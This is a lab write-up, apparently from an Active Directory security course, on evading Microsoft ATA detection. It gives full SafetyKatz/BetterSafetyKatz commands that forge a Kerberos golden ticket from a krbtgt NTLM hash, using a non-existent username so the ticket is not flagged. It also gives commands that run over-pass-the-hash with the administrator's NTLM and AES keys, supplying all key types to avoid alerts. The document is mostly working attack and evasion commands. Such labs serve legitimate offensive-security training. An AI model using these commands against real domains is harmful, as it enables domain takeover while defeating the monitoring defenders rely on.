Skip to content

Latest commit

 

History

History
55 lines (33 loc) · 1.84 KB

l29-BypassATA.md

File metadata and controls

55 lines (33 loc) · 1.84 KB

Hands-on 29: Bypassing ATA


Tasks

  • Create a golden ticket with NTLM hash of krbtgt without detection by ATA.
  • Use AES keys of administrator to run a PowerShell session using OverPTH without detection in ATA.


Create a golden ticket with NTLM hash of krbtgt without detection by ATA

Note ATA (1.9) does not detect Golden tickets created with a non-existent username.

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:atabypass /domain:us.techcorp.local /sid:S-1-5-21-210670787-2521448726-163245708 /krbtgt:b0975ae49f441adc6b024ad238935af5 /ptt" "exit"

picture 19


Try to access us-dc:

dir \\us-dc.us.techcorp.local\c$

picture 20



Use AES keys of administrator to run a PowerShell session using OverPTH without detection in ATA

When doing Over-PTH, when providing all NTLM, AES128 and AES256, it avoids detection by ATA.

C:\AD\Tools\SafetyKatz.exe "sekurlsa::pth /user:administrator /domain:us.techcorp.local /ntlm:43b70d2d979805f419e02882997f8f3f /aes128:c9ae4aae409161db4cbb534f58457944 /aes256:db7bd8e34fada016eb0e292816040a1bf4eeb25cd3843e041d0278d30dc1b335 /run:cmd.exe" "exit"

picture 21